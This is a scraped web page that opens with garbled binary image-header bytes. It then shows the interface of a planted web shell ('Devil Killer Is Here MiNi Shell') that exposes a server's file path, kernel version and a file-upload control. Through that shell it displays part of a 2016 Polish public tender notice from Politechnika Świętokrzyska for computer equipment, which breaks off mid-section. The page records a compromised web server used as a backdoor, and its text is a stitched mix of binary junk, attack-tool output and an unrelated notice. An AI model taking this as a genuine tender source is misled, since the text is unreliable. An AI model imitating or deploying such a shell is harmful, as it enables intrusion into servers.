JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161103/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161103/335492-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://tu.kielce.pl/przetargi/' target='_blank'>http://tu.kielce.pl/przetargi/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 335492 - 2016
              z dnia 2016-11-03 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kielce: Dostawa sprzętu komputerowego dla Politechniki Świętokrzyskiej<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Politechnika Świętokrzyska, krajowy numer identyfikacyjny
              169500000, ul.
              Al. Tysiąclecia Państwa Polskiego 
              7,
              25314  
              Kielce, woj.
              świętokrzyskie, państwo
              Polska, tel.
              413 424 150, e-mail
              , faks
              041 3443874,041 3424140.
              <br />
              Adres strony internetowej (URL): http://tu.kielce.pl/przetargi/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Podmiot prawa publicznego
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://tu.kielce.pl/przetargi/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Składanie ofert wraz z załącznikami odbywa się za pośrednictwem poczty, osobiście lub za pośrednictwem posłańca (kuriera)<br />
                Adres:
                <br />Politechnika Świętokrzyska Al. Tysiąclecia Państwa Polskiego 7, 25-314 Kielce, Budynek B, pokój nr 2.33 (Dział Zamówień Publicznych)</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa sprzętu komputerowego dla Politechniki Świętokrzyskiej<br /><b>Numer referencyjny: </b>ATZ-381-28/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest dostawa fabrycznie nowego sprzętu komputerowego wraz z oprogramowaniem tj: 

komputery osobiste, drukarki laserowe, pakiety oprogramowania użytkowego ogólnego, pakiety oprogramowania do tworzenia dokumentów, nośniki danych, napędy dyskowe, kolorowe drukarki atramentowe, komputery przenośne, torby na komputery przenośne, w, komputer biurkowy, drukarki laserowe, dla Politechniki Świętokrzyskiej zgodnie z opisem przedmiotu zamówienia stanowiącym załącznik nr 1 do SIWZ.
Zamawiający dopuszcza realizację przedmiotu zamówienia 
w częściach podanych w załączniku nr 1 do SIWZ.W ramach zamówienia Wykonawca jest zobowiązany do:
- przekazania Zamawiającemu szczegółowych instrukcji obsługi 
i konserwacji w języku polskim dla każdej jednostki dostarczonego sprzętu,
- przekazania prawa do korzystania z oprogramowania zainstalowanego w urządzeniach komputerowych lub dostarczonego wraz z urządzeniem,
- udzielenia serwisu gwarancyjnego na warunkach co najmniej takich jak w załączniku nr 5 do siwz,
- zapewnienia serwisu pogwarancyjnego.

Ponadto sprzęt powinien być wyposażony we wszystkie elementy (przyłącza, kable itp) niezbędne do uruchomienia, podłączenia i pracy u Zamawiającego do celu, dla którego przedmiot zamówienia jest zakupywany.

<br /><br /><b>II.5) Główny kod CPV: </b>30213000-5<br /><b> Dodatkowe kody CPV:</b>30232110-8,
                48771000-3,
                48310000-4,
                32582000-6,
                30233132-5,
                30232130-4,
                30213100-6,
                30237270-2,
                30213300-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              20464.23<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 14<br /></div><div style="padding-left: 20px"><br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Za znajdującego się w sytuacji ekonomicznej i finansowej zapewniającej  wykonanie poszczególnych części zamówienia uzna się Wykonawcę, który posiada środki finansowe lub zdolność kredytową o wartości co najmniej  takiej jak wskazano  poniżej  dla danej części przedmiotu zamówienia:
- część zamówienia nr I -  wymagana wysokość środków lub zdolność kredytowa nie mniejsza niż:   500,00 PLN,
- część zamówienia nr II -  wymagana wysokość środków lub zdolność kredytowa nie mniejsza niż:   500,00 PLN,
- część zamówienia nr III -  wymagana wysokość środków lub zdolność kredytowa nie mniejsza niż:   200,00 PLN,
- część zamówienia nr IV -  wymagana wysokość środków lub zdolność kredytowa nie mniejsza niż:   800,00 PLN,
- część zamówienia nr V -  wymagana wysokość środków lub zdolność kredytowa nie mniejsza niż:   1 900,00 PLN,
- część zamówienia nr VI -  wymagana wysokość środków lub zdolność kredytowa nie mniejsza niż:   250,00 PLN,
- część zamówienia nr VII -  wymagana wysokość środków lub zdolność kredytowa nie mniejsza niż:   3 900,00 PLN,
- część zamówienia nr VIII -  wymagana wysokość środków lub zdolność kredytowa nie mniejsza niż:   1 900,00 PLN,
- część zamówienia nr IX -  wymagana wysokość środków lub zdolność kredytowa nie mniejsza niż:    900,00 PLN,
- część zamówienia nr X -  wymagana wysokość środków lub zdolność kredytowa nie mniejsza niż:   1 500,00 PLN,
- część zamówienia nr XI -  wymagana wysokość środków lub zdolność kredytowa nie mniejsza niż:    200,00 PLN,

W przypadku składania oferty na więcej niż jedną część przedmiotu zamówienia Wykonawca zobowiązany jest wykazać środki finansowe lub zdolność kredytową na kwotę stanowiącą sumę kwot wykazanych powyżej dla poszczególnych części przedmiotu zamówienia.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Za posiadającego zdolność techniczną lub zawodową uzna się Wykonawcę, który w okresie ostatnich 3 lat przed dniem  wszczęcia postępowania o udzielenie zamówienia  a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie,  zrealizował  w sposób należyty co najmniej dwie  dostawy  sprzętu odpowiadające  rodzajem  i wartością  tej części przedmiotu zamówienia,  na które Wykonawca  składa ofertę o wartości nie niższej  dla każdej z nich  niż wykazana poniżej kwota : 
- część zamówienia nr I -  wartość zrealizowanej dostawy nie mniejsza niż:     500,00 PLN,
- część zamówienia nr II -  wartość zrealizowanej dostawy nie mniejsza niż:     500,00 PLN,
- część zamówienia nr III -  wartość zrealizowanej dostawy nie mniejsza niż:     200,00 PLN,
- część zamówienia nr IV -  wartość zrealizowanej dostawy nie mniejsza niż:     800,00 PLN,
- część zamówienia nr V -  wartość zrealizowanej dostawy nie mniejsza niż:     1 900,00 PLN,
- część zamówienia nr VI -  wartość zrealizowanej dostawy nie mniejsza niż:      250,00 PLN,
- część zamówienia nr VII -  wartość zrealizowanej dostawy nie mniejsza niż:     3 900,00 PLN,
- część zamówienia nr VIII -  wartość zrealizowanej dostawy nie mniejsza niż:     1 900,00 PLN,
- część zamówienia nr IX -  wartość zrealizowanej dostawy nie mniejsza niż:      900,00 PLN,
- część zamówienia nr X -  wartość zrealizowanej dostawy nie mniejsza niż:     1 500,00 PLN,
- część zamówienia nr XI -  wartość zrealizowanej dostawy nie mniejsza niż:      200,00 PLN
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">- Wykonawca , który powołuje się  na zasoby innych podmiotów  w celu wykazania  braku istnienia wobec  nich  podstaw wykluczenia oraz spełnienia warunków udziału w postępowaniu  zamieszcza o tych  podmiotach informacje w oświadczeniu
- Wykonawca , który zamierza  powierzyć wykonanie części zamówienia podwykonawcom  w celu wykazania  braku istnienia  wobec nich podstaw  wykluczenia  z udziału w postępowaniu  zamieszcza  o podwykonawcach informację w oświadczeniach.
- Wykonawca, w terminie 3 dni od zamieszczenia przez Zamawiającego na stronie internetowej informacji dotyczących kwoty, jaką zamierza przeznaczyć na sfinansowanie zamówienia, firm oraz adresów wykonawców, którzy złożyli oferty w terminie, ceny, terminu wykonania zamówienia, okresu gwarancji i warunków płatności zawartych w ofertach, przekazuje zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 Pzp. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. 
Wzór oświadczenia o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 Pzp stanowi Załącznik  nr 8 do SIWZ.
- Odpis z właściwego rejestru lub z centralnej ewidencji 
i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 Pzp (Z postępowania o udzielenie zamówienia zamawiający wykluczy wykonawcę w stosunku do którego otwarto likwidację, w zatwierdzonym przez sąd układzie w postępowaniu restrukturyzacyjnym jest przewidziane zaspokojenie wierzycieli przez likwidację jego majątku lub sąd zarządził likwidację jego majątku w trybie art. 332 ust. 1 ustawy z dnia 15 maja 2015 r. - Prawo restrukturyzacyjne (Dz. U. poz. 978, z późn. zm.) lub którego upadłość ogłoszono, z wyjątkiem wykonawcy, który po ogłoszeniu upadłości zawarł układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli przez likwidację majątku upadłego, chyba że sąd zarządził likwidację jego majątku w trybie art. 366 ust. 1 ustawy z dnia 28 lutego 2003 r. - Prawo upadłościowe (Dz. U. z 2015 r. poz. 233, z późn. zm.)
- Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. VI ust. 5 lit.c - składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie otwarto jego likwidacji ani nie ogłoszono upadłości.


</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />- Wykaz dostaw (co najmniej dwóch) wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, 
w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania 
i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu. Zamawiający żąda od wykonawcy, który polega na zdolnościach technicznych  lub zawodowych  lub sytuacji finansowej lub ekonomicznej  innych podmiotów na zasadach określonych w art. 22a  ustawy PZP  przedstawienia w odniesieniu do tych podmiotów:   

a/ pisemnego  zobowiązania   tych podmiotów  do oddania Wykonawcy do dyspozycji  zasobów na potrzeby realizacji,

b/  dokumentów  na potwierdzenie  spełnienia warunków udziału w postępowaniu, 

c/ dokumentów na potwierdzenie braku podstaw  do  wykluczenia.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
